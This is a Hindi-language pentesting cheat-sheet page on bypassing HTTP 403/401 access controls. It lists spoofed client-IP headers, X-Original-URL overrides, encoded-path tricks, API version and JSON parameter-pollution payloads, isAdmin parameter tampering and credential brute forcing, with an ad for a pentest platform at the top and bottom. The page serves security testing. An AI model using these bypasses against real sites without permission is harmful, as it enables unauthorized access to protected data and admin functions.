403 & 401 Bypasses
कमजोरी मूल्यांकन और पेनिट्रेशन टेस्टिंग के लिए तुरंत उपलब्ध सेटअप। 20+ उपकरणों और सुविधाओं के साथ कहीं से भी एक पूर्ण पेंटेस्ट चलाएँ जो पुनः खोज से रिपोर्टिंग तक जाते हैं। हम पेंटेस्टर्स को प्रतिस्थापित नहीं करते - हम कस्टम उपकरण, पहचान और शोषण मॉड्यूल विकसित करते हैं ताकि उन्हें गहराई से खुदाई करने, शेल पॉप करने और मज़े करने के लिए कुछ समय वापस मिल सके।
HTTP Verbs/Methods Fuzzing
फाइल तक पहुँचने के लिए विभिन्न क्रियाओं का उपयोग करने का प्रयास करें: GET, HEAD, POST, PUT, DELETE, CONNECT, OPTIONS, TRACE, PATCH, INVENTED, HACK
प्रतिक्रिया हेडर की जाँच करें, शायद कुछ जानकारी दी जा सकती है। उदाहरण के लिए, HEAD के लिए 200 प्रतिक्रिया जिसमें
Content-Length: 55
है, का मतलब है कि HEAD क्रिया जानकारी तक पहुँच सकती है। लेकिन आपको अभी भी उस जानकारी को निकालने का एक तरीका खोजना होगा।X-HTTP-Method-Override: PUT
जैसे HTTP हेडर का उपयोग करने से उपयोग की गई क्रिया को ओवरराइट किया जा सकता है।TRACE
क्रिया का उपयोग करें और यदि आप बहुत भाग्यशाली हैं तो शायद प्रतिक्रिया में आप मध्यवर्ती प्रॉक्सी द्वारा जोड़े गए हेडर भी देख सकते हैं जो उपयोगी हो सकते हैं।
HTTP Headers Fuzzing
Host हेडर को किसी मनमाने मान में बदलें (यहाँ काम किया)
संसाधन तक पहुँचने के लिए अन्य उपयोगकर्ता एजेंटों का उपयोग करने का प्रयास करें।
HTTP हेडर को फज़ करें: HTTP प्रॉक्सी हेडर, HTTP प्रमाणीकरण बेसिक और NTLM ब्रूट-फोर्स (केवल कुछ संयोजनों के साथ) और अन्य तकनीकों का उपयोग करने का प्रयास करें। इसके लिए मैंने उपकरण fuzzhttpbypass बनाया है।
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwarded: 127.0.0.1
Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-ProxyUser-Ip: 127.0.0.1
X-Original-URL: 127.0.0.1
Client-IP: 127.0.0.1
True-Client-IP: 127.0.0.1
Cluster-Client-IP: 127.0.0.1
X-ProxyUser-Ip: 127.0.0.1
Host: localhost
यदि पथ सुरक्षित है तो आप इन अन्य हेडरों का उपयोग करके पथ सुरक्षा को बायपास करने का प्रयास कर सकते हैं:
X-Original-URL: /admin/console
X-Rewrite-URL: /admin/console
यदि पृष्ठ प्रॉक्सी के पीछे है, तो शायद प्रॉक्सी आपको निजी जानकारी तक पहुँचने से रोक रही है। HTTP Request Smuggling या hop-by-hop हेडर** का दुरुपयोग करने का प्रयास करें।**
विभिन्न प्रतिक्रियाओं की तलाश में विशेष HTTP हेडर को फज़ करें।
HTTP विधियों को फज़ करते समय विशेष HTTP हेडर को फज़ करें।
Host हेडर को हटा दें और शायद आप सुरक्षा को बायपास करने में सक्षम होंगे।
Path Fuzzing
यदि /path अवरुद्ध है:
/**%2e/path _ का उपयोग करने का प्रयास करें (यदि पहुँच प्रॉक्सी द्वारा अवरुद्ध है, तो यह सुरक्षा को बायपास कर सकता है)। _** /%252e**/path (डबल URL एन्कोड) का भी प्रयास करें
Unicode बायपास का प्रयास करें: /%ef%bc%8fpath (URL एन्कोडेड वर्ण जैसे "/" हैं) इसलिए जब इसे फिर से एन्कोड किया जाएगा तो यह //path होगा और शायद आप पहले से ही /path नाम की जाँच को बायपास कर चुके होंगे
अन्य पथ बायपास:
site.com/secret –> HTTP 403 Forbidden
site.com/SECRET –> HTTP 200 OK
site.com/secret/ –> HTTP 200 OK
site.com/secret/. –> HTTP 200 OK
site.com//secret// –> HTTP 200 OK
site.com/./secret/.. –> HTTP 200 OK
site.com/;/secret –> HTTP 200 OK
site.com/.;/secret –> HTTP 200 OK
site.com//;//secret –> HTTP 200 OK
site.com/secret.json –> HTTP 200 OK (ruby)
निम्नलिखित स्थितियों में इस सूची का उपयोग करें:
/FUZZsecret
/FUZZ/secret
/secretFUZZ
अन्य API बायपास:
/v3/users_data/1234 --> 403 Forbidden
/v1/users_data/1234 --> 200 OK
{“id”:111} --> 401 Unauthorized
{“id”:[111]} --> 200 OK
{“id”:111} --> 401 Unauthorized
{“id”:{“id”:111}} --> 200 OK
{"user_id":"<legit_id>","user_id":"<victims_id>"} (JSON पैरामीटर प्रदूषण)
user_id=ATTACKER_ID&user_id=VICTIM_ID (पैरामीटर प्रदूषण)
Parameter Manipulation
param मान बदलें:
id=123
-->id=124
URL में अतिरिक्त पैरामीटर जोड़ें:
?
id=124
—->id=124&isAdmin=true
पैरामीटर हटा दें
पैरामीटर का क्रम बदलें
विशेष वर्णों का उपयोग करें।
पैरामीटर में सीमा परीक्षण करें — जैसे -234 या 0 या 99999999 (केवल कुछ उदाहरण मान) प्रदान करें।
Protocol version
यदि HTTP/1.1 का उपयोग कर रहे हैं तो 1.0 का उपयोग करने का प्रयास करें या यह भी परीक्षण करें कि क्या यह 2.0 का समर्थन करता है।
Other Bypasses
डोमेन का IP या CNAME प्राप्त करें और प्रत्यक्ष संपर्क करने का प्रयास करें।
सामान्य GET अनुरोध भेजकर सर्वर पर दबाव डालने का प्रयास करें (यह इस व्यक्ति के लिए फेसबुक के साथ काम किया).
प्रोटोकॉल बदलें: http से https में, या https से http में
https://archive.org/web/ पर जाएँ और जाँचें कि क्या अतीत में वह फ़ाइल विश्व स्तर पर सुलभ थी।
Brute Force
पासवर्ड का अनुमान लगाएँ: निम्नलिखित सामान्य क्रेडेंशियल्स का परीक्षण करें। क्या आप पीड़ित के बारे में कुछ जानते हैं? या CTF चुनौती का नाम?
Brute force: बुनियादी, डाइजेस्ट और NTLM प्रमाणीकरण का प्रयास करें।
स्वचालित उपकरण
कमजोरी मूल्यांकन और पेनिट्रेशन परीक्षण के लिए तुरंत उपलब्ध सेटअप। कहीं से भी 20+ उपकरणों और सुविधाओं के साथ एक पूर्ण पेंटेस्ट चलाएँ जो पुनः खोज से रिपोर्टिंग तक जाते हैं। हम पेंटेस्टर्स का स्थान नहीं लेते - हम उन्हें गहराई से खुदाई करने, शेल पॉप करने और मज़े करने के लिए कुछ समय वापस देने के लिए कस्टम उपकरण, पहचान और शोषण मॉड्यूल विकसित करते हैं।
Last updated